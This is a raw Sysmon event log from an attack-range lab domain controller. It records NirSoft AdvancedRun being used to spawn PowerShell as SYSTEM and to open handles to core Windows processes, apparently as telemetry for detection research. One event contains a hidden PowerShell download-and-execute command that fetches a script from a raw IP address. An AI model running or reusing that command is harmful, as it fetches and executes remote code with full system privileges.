734700x80000000000000004077101Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.140{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077100Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.140{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077099Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.139{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077098Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.138{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077097Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.138{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077096Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.137{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077095Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.137{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 10341000x80000000000000004077094Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.134{834264DD-DAF8-61EA-5B00-000000002702}41005552C:\Windows\system32\csrss.exe{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004077093Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.133{834264DD-E497-61EA-F301-000000002702}9444688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a283d8|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a2794aATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000004077092Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.125{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfg /runC:\Users\Administrator\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 534500x80000000000000004076011Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.590{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeATTACKRANGE\Administrator 154100x80000000000000004076005Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.587{834264DD-144E-61EB-8008-000000002702}2072C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoExit -executionpolicy bypass -File "powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://34.218.235.219:80/b'))""C:\Windows\System32\NT AUTHORITY\SYSTEM{834264DD-DAE4-61EA-E703-000000000000}0x3e72SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfg /runATTACKRANGE\Administrator 10341000x80000000000000004076004Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.580{834264DD-DAE7-61EA-1700-000000002702}13003532C:\Windows\System32\svchost.exe{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004076003Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.580{834264DD-DAE7-61EA-1700-000000002702}13003532C:\Windows\System32\svchost.exe{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004076002Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.580{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21f3|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21bd|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004076001Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.578{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132D-61EB-5B08-000000002702}5868C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004076000Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.578{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132D-61EB-5A08-000000002702}4608c:\windows\syswow64\windowspowershell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075999Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.578{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132A-61EB-5908-000000002702}1164C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075998Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.578{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132A-61EB-5808-000000002702}3136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075997Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.578{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-12C7-61EB-4508-000000002702}2204C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004075996Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.577{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C807-000000002702}3452C:\Program Files\OpenJDK\jdk-17.0.1\bin\java.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004075995Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.577{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C707-000000002702}2228C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004075994Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.577{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C607-000000002702}2224C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004075993Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 